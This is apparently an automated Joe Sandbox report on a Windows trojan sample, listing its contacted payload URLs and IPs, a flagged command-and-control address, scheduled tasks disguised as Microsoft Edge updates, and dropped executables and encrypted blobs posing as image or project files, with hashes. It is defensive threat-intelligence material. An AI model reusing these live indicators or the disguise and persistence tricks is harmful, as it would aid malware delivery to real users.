https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/s.jpg	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/d.gif	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg	0%	Avira URL Cloud	safe
http://cevcsca2021.ocsp-certum.com07	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/L	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/a.gif	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/F	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/i.dat	0%	Avira URL Cloud	safe
http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w	0%	Avira URL Cloud	safe
http://%s/upx.rarC:	0%	Avira URL Cloud	safe
http://www.color.org)/S/GTS_PDFX/Type/OutputIntent	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/7-2476756634-1002	0%	Avira URL Cloud	safe
http://%s/ip.txtC:	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/b.gif	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/s.dat	0%	Avira URL Cloud	safe
http://www.microsoft.coW	0%	Avira URL Cloud	safe
http://%s/ip.txt	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/iS	0%	Avira URL Cloud	safe
http://%s/upx.rar	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/a.gifhttps://3syd1z.oss-cn-beijing.aliyuncs.com/b.gifhttp	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
sc-2ox2.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	39.103.20.97	true	false	high
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	118.178.60.9	true	false	unknown
psffvt.net	unknown	unknown	false	unknown
3syd1z.oss-cn-beijing.aliyuncs.com	unknown	unknown	false	unknown
22mm.oss-cn-hangzhou.aliyuncs.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/c.gif	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/s.jpg	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/d.gif	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/a.gif	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/i.dat	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/b.gif	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/s.dat	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://adoptium.net/	0000000000000000.exe	false		high
http://crl.certum.pl/ctsca2021.crl0o	0000000000000000.exe	false		high
http://www.extensis.com/meta/FontSense/	0000000000000000.exe	false	Avira URL Cloud: safe	unknown
http://%s/%d.dll	Nw13Wr.exe, Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microsoft	0000000000000000.exe, 00000000.00000003.2132343159.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	0000000000000000.exe	false		high
http://%s/%d.dllC:	Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://adoptium.net/https://discord.gg/BdCcpDZ322562An	0000000000000000.exe	false		high
http://cipa.jp/exif/1.0/	0000000000000000.exe	false		high
http://repository.certum.pl/cevcsca2021.cer0	0000000000000000.exe	false		high
https://3syd1z.oss-cn-beijing.aliyuncs.com/p	0000000000000000.exe, 00000000.00000003.2132388125.00000000005BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/	0000000000000000.exe, 00000000.00000003.2132388125.00000000005BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	qWXt7a.exe.0.dr, 189atohci.sys.0.dr	false		high
http://repository.certum.pl/ctsca2021.cer0	0000000000000000.exe	false		high
http://subca.ocsp-certum.com05	0000000000000000.exe	false		high
http://subca.ocsp-certum.com02	0000000000000000.exe	false		high
http://subca.ocsp-certum.com01	0000000000000000.exe	false		high
http://www.npes.org/pdfx/ns/id/	0000000000000000.exe	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/a.gift	0000000000000000.exe, 00000000.00000003.2132343159.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.certum.pl/ctnca2.crl0l	0000000000000000.exe	false		high
http://repository.certum.pl/ctnca2.cer09	0000000000000000.exe	false		high
https://3syd1z.oss-cn-beijing.aliyuncs.com/a.gifz	0000000000000000.exe, 00000000.00000003.2132343159.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.certum.pl/CPS0	0000000000000000.exe	false		high
http://cevcsca2021.ocsp-certum.com07	0000000000000000.exe	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/L	0000000000000000.exe, 00000000.00000003.2132388125.00000000005B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://repository.certum.pl/ctnca.cer09	0000000000000000.exe	false		high
http://crl.certum.pl/ctnca.crl0k	0000000000000000.exe	false		high
https://3syd1z.oss-cn-beijing.aliyuncs.com/F	0000000000000000.exe, 00000000.00000003.2132388125.00000000005B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	qWXt7a.exe.0.dr, 189atohci.sys.0.dr	false		high
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline	0000000000000000.exe	false		high
http://upx.sf.net	0000000000000000.exe	false		high
http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w	0000000000000000.exe	false	Avira URL Cloud: safe	unknown
https://www.certum.pl/CPS0	0000000000000000.exe	false		high
http://www.color.org)/S/GTS_PDFX/Type/OutputIntent	0000000000000000.exe	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/cps0(	qWXt7a.exe.0.dr	false		high
http://%s/upx.rarC:	Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/7-2476756634-1002	0000000000000000.exe, 00000000.00000003.2132388125.00000000005BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/ip.txtC:	Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.gg/BdCcpDZ	0000000000000000.exe	false		high
http://www.symauth.com/rpa00	qWXt7a.exe.0.dr	false		high
http://%s/ip.txt	Nw13Wr.exe, Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.coW	0000000000000000.exe, 00000000.00000003.2132343159.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/iS	0000000000000000.exe, 00000000.00000003.2132388125.00000000005BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/upx.rar	Nw13Wr.exe, Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/a.gifhttps://3syd1z.oss-cn-beijing.aliyuncs.com/b.gifhttp	0000000000000000.exe, 00000000.00000003.2132343159.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
118.178.60.9	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
8.217.35.192	unknown	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
39.103.20.97	sc-2ox2.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582965
Start date and time:	2025-01-01 08:29:01 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	46
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	0000000000000000.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@64/29@14/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 62% Number of executed functions: 16 Number of non-executed functions: 118
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:30:57	Task Scheduler	Run new task: 3fo5e path: C:\Users\user\Documents\qWXt7a.exe
07:31:44	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 k9gWH path: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe
07:31:45	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 VmBDr path: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
118.178.60.9	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Get hash	malicious	Nitol	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Get hash	malicious	Nitol	Browse	118.178.60.9

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	kwari.mpsl.elf	Get hash	malicious	Unknown	Browse	42.120.21.89
	botx.sh4.elf	Get hash	malicious	Mirai	Browse	47.124.9.123
	botx.m68k.elf	Get hash	malicious	Mirai	Browse	8.178.172.237
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	182.92.191.87
	loligang.arm7.elf	Get hash	malicious	Mirai	Browse	47.119.173.205
	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	8.186.40.138
	mips.elf	Get hash	malicious	Mirai, Moobot	Browse	47.118.42.153
	x86.elf	Get hash	malicious	Mirai, Moobot	Browse	139.240.25.213
	m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	47.109.52.7
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	kwari.mpsl.elf	Get hash	malicious	Unknown	Browse	42.120.21.89
	botx.sh4.elf	Get hash	malicious	Mirai	Browse	47.124.9.123
	botx.m68k.elf	Get hash	malicious	Mirai	Browse	8.178.172.237
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	182.92.191.87
	loligang.arm7.elf	Get hash	malicious	Mirai	Browse	47.119.173.205
	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	8.186.40.138
	mips.elf	Get hash	malicious	Mirai, Moobot	Browse	47.118.42.153
	x86.elf	Get hash	malicious	Mirai, Moobot	Browse	139.240.25.213
	m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	47.109.52.7
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse	8.211.209.238
	letsVPN.exe	Get hash	malicious	Unknown	Browse	8.223.56.120
	letsVPN.exe	Get hash	malicious	Unknown	Browse	8.223.56.120
	T1#U52a9#U624b1.0.1.exe	Get hash	malicious	Unknown	Browse	8.212.101.195
	T1#U52a9#U624b1.0.1.exe	Get hash	malicious	Unknown	Browse	8.212.101.195
	wyySetups64.exe	Get hash	malicious	GhostRat	Browse	149.129.12.34
	V2clgnyM2J.exe	Get hash	malicious	GhostRat	Browse	8.218.163.85
	test5.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	47.90.135.102
	libcurl.dll	Get hash	malicious	Matanbuchus	Browse	47.254.174.185
	EpCAySF1G6.exe	Get hash	malicious	Unknown	Browse	8.218.163.62

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	1.ps1	Get hash	malicious	Unknown	Browse	118.178.60.9 39.103.20.97
	setup.exe	Get hash	malicious	Unknown	Browse	118.178.60.9 39.103.20.97
	Let's_20Compress.exe	Get hash	malicious	Unknown	Browse	118.178.60.9 39.103.20.97
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse	118.178.60.9 39.103.20.97
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse	118.178.60.9 39.103.20.97
	LinxOptimizer.exe	Get hash	malicious	Unknown	Browse	118.178.60.9 39.103.20.97
	setup.msi	Get hash	malicious	Unknown	Browse	118.178.60.9 39.103.20.97
	over.ps1	Get hash	malicious	Vidar	Browse	118.178.60.9 39.103.20.97
	MatAugust.exe	Get hash	malicious	Vidar	Browse	118.178.60.9 39.103.20.97

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Get hash	malicious	Nitol	Browse
C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	setup.ic19.exe	Get hash	malicious	GhostRat, Nitol	Browse
C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Get hash	malicious	Nitol	Browse
C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	setup.ic19.exe	Get hash	malicious	GhostRat, Nitol	Browse

Created / dropped Files

C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe

Download File

Process:	C:\Users\user\Documents\qWXt7a.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54152
Entropy (8bit):	6.64786972992462
Encrypted:	false
SSDEEP:	768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
MD5:	7B6586E21FBC8F2F0BB784A1A8FC65B4
SHA1:	E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
SHA-256:	7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
SHA-512:	E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse Filename: setup.ic19.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Nw13Wr\log.src

Download File

Process:	C:\Users\user\Documents\qWXt7a.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5059989
Entropy (8bit):	7.999955225488289
Encrypted:	true
SSDEEP:	98304:+OQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:Ro6T1MFhE/7qJwBP6TWtttriYE7kjv
MD5:	25E2902CD530AC84EA5778B4A7F0088D
SHA1:	2FDB1561E32E917DD9901C46CA7C335011683CD5
SHA-256:	1EF8496755713EE6BD4537DF13D3897D24DBF1F2C1603A5B3025DE1A81214DC7
SHA-512:	153ADDD6BF054860886F5D09AA6DE22F84DF4A0638A6603A96AD588CAAF93E84E2FDA917261124993EFA626F92864DAB876A862D9C7DAF88F4101641F2BFB26F
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Program Files (x86)\Nw13Wr\tbcore3U.dll

Download File

Process:	C:\Users\user\Documents\qWXt7a.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4858192
Entropy (8bit):	7.992517247748432
Encrypted:	true
SSDEEP:	98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/g:9S4+O6P5OeMRrjRy7aPZbm3k8V/g
MD5:	22FD50D82D3B6DB98198C645189D6EA6
SHA1:	122D269702892C0FF12A6AB4D256AA866F96AD16
SHA-256:	860A15F32ADC3FBED3E37260A00D771E379C7FE56B1633A48DEC530ABD6355A9
SHA-512:	D6630245CBA978BC344CD0DEC65CD055491CB2E0F3D29A84A927228C0F1092F2CF870E5938BD3A68D9EFD772CC83D7FE9588FBC040E777E8864789B4873CD2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....\|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Nw13Wr\utils.vcxproj

Download File

Process:	C:\Users\user\Documents\qWXt7a.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	365477
Entropy (8bit):	7.999399863169529
Encrypted:	true
SSDEEP:	6144:NiACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:E8u69CghoQxoMTFQqtKFCG7mbZ
MD5:	399591826181865E27B5C37F7D89A419
SHA1:	52B4D04968C0ACAF70444C28BFDBE4FA759D8F7C
SHA-256:	826ED90643BF5DCABE61391EF82D7ED5F5792161194765281D5F050238BE377C
SHA-512:	2CD01DE2308EC9984247536A63F97F8C54E458E5FE059FBDCAFA1881802EE70F5EDDF8A0638664AD8A2244F69402107F75A734EF9E7832F1FD2FA09C6542B6FD
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()456789:CDEF8.217.35.192....."ijstuvwxyz....psffvt.net......3#..............35.192....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe

Download File

Process:	C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54152
Entropy (8bit):	6.64786972992462
Encrypted:	false
SSDEEP:	768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
MD5:	7B6586E21FBC8F2F0BB784A1A8FC65B4
SHA1:	E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
SHA-256:	7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
SHA-512:	E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse Filename: setup.ic19.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\W9sgnm2c\log.src

Download File

Process:	C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5059989
Entropy (8bit):	7.999955226920175
Encrypted:	true
SSDEEP:	98304:qOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:Fo6T1MFhE/7qJwBP6TWtttriYE7kjv
MD5:	5A775E2B9CF3369D7B219B93F45438B7
SHA1:	16F87F2B7E09733642D10130D4695E0CEBC464ED
SHA-256:	FF99E697A459CD60739C8D990830291A18633DBF5192BA6CA737DEDD40ED5D01
SHA-512:	9BD2F910535338A287AB250D03290D68353079F839F361FB6D9E3ED6A078470CCE3B361C5CFDF5C080C1EDC2642277FDBF4E5EFB4560CA516157A74760A62618
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..}..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Program Files (x86)\W9sgnm2c\tbcore3U.dll

Download File

Process:	C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4858192
Entropy (8bit):	7.992516699882882
Encrypted:	true
SSDEEP:	98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/n:9S4+O6P5OeMRrjRy7aPZbm3k8V/n
MD5:	EB2D0BB586DB8C822380C37898CA0796
SHA1:	47F2C313DFA2C41F8FDA67CE551E0D1DD8E2964E
SHA-256:	EA34ADF7214351CD96DCA54443A543878EF8B9645A8CA6E373258764F91BDA74
SHA-512:	4D016AF1B2CE13C617C68D0AB3EB9C6F68467AA4C8A8654C29FE8BD6CEE26478C06D2FE66A3C1FED2259AAEBD022A9DEA21E3B21D7FFFD6031261877E8679A1B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
